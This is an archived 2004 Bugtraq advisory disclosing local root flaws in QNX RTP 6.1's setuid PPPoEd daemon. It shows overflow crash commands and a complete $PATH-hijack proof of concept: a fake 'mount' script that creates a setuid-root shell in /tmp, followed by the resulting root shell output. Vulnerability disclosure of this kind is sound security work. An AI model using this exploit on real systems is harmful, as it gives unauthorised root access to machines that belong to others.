lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 5 Sep 2004 14:25:11 -0000
From: Julio Cesar Fort <julio@...slabs.com.br>
To: bugtraq@...urityfocus.com
Subject: [RLSA_01-2004] QNX PPPoEd local root vulnerabilities




                *** rfdslabs security advisory ***

Title: QNX PPPoEd local root vulnerabilities [RLSA_01-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: http://www.qnx.com
Date: 02 Sep 2004

Author: Julio Cesar Fort <julio at rfdslabs com br>


1. Introduction

   PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX
users. More information can be found at QNX Developer Support:
www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html
There are two vulnerabilities that can lead to local root access.

2. Details

#1 Buffer overflow

   PPPoEd has multiple problems with bounds checking. Almost every flag with
oversized length crashes PPPoEd, overwriting memory. Once it is by default suid
owned by root, an attacker can execute arbitrary instructions to elevate privi-
ledges. Above is an example to cause this overflow.

$ export overflow256='AAAAAAAAAAAAAAA(...)' (around 256 A's)
$ /usr/bin/pppoed -F $overflow256
Memory fault (core dumped)
$ /usr/bin/pppoed service=$overflow256
Memory fault (core dumped)
...
And it repeats in 'name', 'en', 'upscript', 'downscript', 'retries', 'timeout',
'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac' flags.


#2 Old $PATH trick

   PPPoEd calls "mount -T io-net npm-pppoe.so" without full path. If someone
wants to cheat PPPoEd and tricks it to execute his own malicious code, it can
be possible modifying $PATH. With this modification, '/usr/sbin/pppoed' will
simple execute 'mount' (hostile code) looking for it at /tmp directory.
Simple proof-of-concept steps are above.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x    1 sandimas users          88 Aug  25 2004 mount
-rwsrwxrwx    1 root     100        153384 Jun  22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#

3. Solution

   rfdslabs tried to contact QNX Software Systems but no security staff e-mail
was found. No solution yet.

4. Timeline

27 Aug 2004: Vulnerabilities detected;
28 Aug - 01 Sep: Looking for QNX security staff contact e-mail: no success;
02 Sep 2004: Advisory written and sent to security mail-lists.

Thanks to DataStorm Technologies, Lucien Rocha and everyone at rfdslabs.

www.rfdslabs.com.br - computers, sex, humand mind and more
Recife, PE, Brazil

--- message sent for the second time ---

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ